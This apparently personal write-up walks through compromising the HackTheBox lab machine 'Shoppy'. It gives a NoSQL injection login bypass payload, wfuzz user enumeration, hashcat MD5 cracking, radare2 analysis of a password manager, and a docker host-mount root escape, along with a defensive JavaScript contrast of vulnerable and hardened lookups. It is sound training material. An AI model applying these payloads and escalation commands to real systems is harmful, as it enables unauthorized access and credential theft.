dennis@home:~$

Shoppy HackTheBox

recon

# nmap -sC -sV -Ao nmap 10.10.11.180

# Nmap 7.92 scan initiated Thu Sep 29 08:59:36 2022 as: nmap -sC -sV -Ao nmap.again 10.10.11.180
Nmap scan report for 10.10.11.180
Host is up (0.019s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
|   256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_  256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open  http    nginx 1.23.1
|_http-server-header: nginx/1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 29 09:00:05 2022 -- 1 IP address (1 host up) scanned in 29.38 seconds

open ports

  • 22 = ssh
  • 80 = nginx http

enumerating directories and subdomains

# find directories
gobuster dir -u http://shoppy.htb -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt

# find subdomains
gobuster dns -w /usr/share/seclists/Discovery/DNS/namelist.txt -t 50 -d shoppy.htb

These scans reveal that there is a login page under shoppy.htb/login and a subdomain mattermost.

nosql injection

The login page is vulnerable to NoSQL injection, which can be exploited by submitting admin'||'1==1 as the username.

After logging in we can search for users and get their hashed passwords. We know the user admin exists because we used that username in the NoSQL injection, so we know what a positive search result looks like.
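Why that payload works and how the lookup should have been written, as an added in-memory model that is not the Shoppy application's code: a MongoDB-style $where login lookup built by string concatenation beside a hardened equality lookup (Mongo evaluates $where as JavaScript, so new Function stands in for that evaluator here; user records are constructed sample data).

```javascript
// Constructed sample user collection (placeholder hashes, not values from the box).
const USERS = [
  { username: "admin", password: "<hash-placeholder-admin>" },
  { username: "josh",  password: "<hash-placeholder-josh>" },
];

// Vulnerable: the username is concatenated into a $where expression. A value such as
// admin'||'1==1 closes the quote and appends a truthy string, so every document matches.
function findUserVulnerable(username) {
  const where = `this.username == '${username}'`;
  const test = new Function("return (" + where + ");"); // stand-in for Mongo's $where
  return USERS.filter((doc) => test.call(doc));
}

// Hardened: accept only a plain, well-formed string and compare by strict equality,
// the equivalent of passing { username } as a literal filter instead of a $where string.
const USERNAME_RE = /^[a-z0-9_.-]{1,32}$/i;
function findUserHardened(username) {
  if (typeof username !== "string" || !USERNAME_RE.test(username)) {
    return []; // also blocks operator objects such as { $ne: null } arriving in JSON bodies
  }
  return USERS.filter((doc) => doc.username === username);
}

// Runs the same payload through both lookups and returns the matched usernames.
function demo() {
  const payload = "admin'||'1==1";
  return {
    vulnerable: findUserVulnerable(payload).map((u) => u.username), // ["admin", "josh"]
    hardened: findUserHardened(payload).map((u) => u.username),     // []
    legit: findUserHardened("josh").map((u) => u.username),         // ["josh"]
  };
}

console.log(demo());
```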

With this information we can look for other users with wfuzz.

get users with wfuzz

wfuzz -c -z file,/usr/share/seclists/Usernames/Names/names.txt -L --hh 2561 --hc 500 -b "Cookie: rl_user_id=RudderEncrypt%3AU2FsdGVkX1%2FU2e5ivWS313EqHejrDqmqWBOz%2B7JiK1ZGG8%2F1YJwbMqu75MRDE0GU; rl_anonymous_id=RudderEncrypt%3AU2FsdGVkX1%2FUY9maqReUKFXmGrrT34nxbATStnx0je7zCF90BWcHFlQ0UyMBoDkHwtnp1WJHOC9wgPADeoHzXw%3D%3D; rl_group_id=RudderEncrypt%3AU2FsdGVkX18zrc11pNHh3MGWXwjk8h1haEPxMCFoUas%3D; rl_trait=RudderEncrypt%3AU2FsdGVkX1%2BvmEdwpOw3wnRMj5AHU%2BCwhP1yuW80jog%3D; rl_group_trait=RudderEncrypt%3AU2FsdGVkX18s9pN%2BNQ675PZeUnKOiPXIxXeioQcUDB8%3D; connect.sid=s%3A9xH10SZ2ZaAI3nOvgVp8GSxULBvnaDUp.e%2BkKff%2B%2BDrQhWq5D35SR4qy4jYNJraJLAzGmS9ByjEw" http://shoppy.htb/admin/search-users\?username\=FUZZ

Important here is to follow the redirect with the -L argument and to pass the cookie value with the -b argument. I was struggling a bit with it because it always returned the same results until I tried it with curl and recognized that the request needs the cookie to succeed.

When used correctly, the resulting users are admin, which we already knew, and josh:

000000086:   200        55 L     160 W      2720 Ch     "admin"
000004909:   200        55 L     160 W      2720 Ch     "josh"

When clicking on "Download Export" we get an id, username and a hashed password. The hashed password is 32 hex characters long, which is an indication of the weak MD5 hashing algorithm.

cracking found passwords

Using hashcat, we store the two hashes for admin and josh in a file hash.txt. By running hashcat hash.txt we can determine what kind of hash it could be and so confirm that the MD5 assumption is right. To crack the passwords run:

# crack the MD5 hashes (mode 0) against the wordlist
hashcat -m 0 hash.txt rockyou.txt

# print the cracked results from the potfile
hashcat -m 0 --show hash.txt rockyou.txt

getting user level

So we get the password for josh, which we can use for the subdomain mattermost. Here we can log in as josh, and by looking around there are credentials for jaeger which we can use to ssh into the box and get the user.txt.

privilege escalation

By running sudo -l we can examine which commands the user can execute.
We find the executable /home/deploy/password-manager which we can run as the deploy user.

sudo -u deploy /home/deploy/password-manager

We are asked about a master password which we can reverse engineer.

reverse engineering master password

By copying the executable to the local machine we can inspect it with the tools we are familiar with. First I tried to get the strings in it to see whether the password was stored in clear text in the binary.

strings password-manager

Unfortunately no success with it.

To continue we can use radare2 to get more information about the executable.

r2 password-manager
# analyze all functions
aaa
# seek to main
s main
# open the visual graph view
VV

In the call graph that is now shown we can find the string Sample.

So we can authenticate in the password-manager with this master password and we get the credentials for the deploy user.

We can now login as deploy by executing su deploy

getting root

Still no permissions to access /root so we have to continue…

By looking around we can find out that we can run docker without superuser rights. So we look for docker in GTFOBins to bypass security restrictions and find this.

To become root we run the command explained at the bottom of the site.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Voila. We are root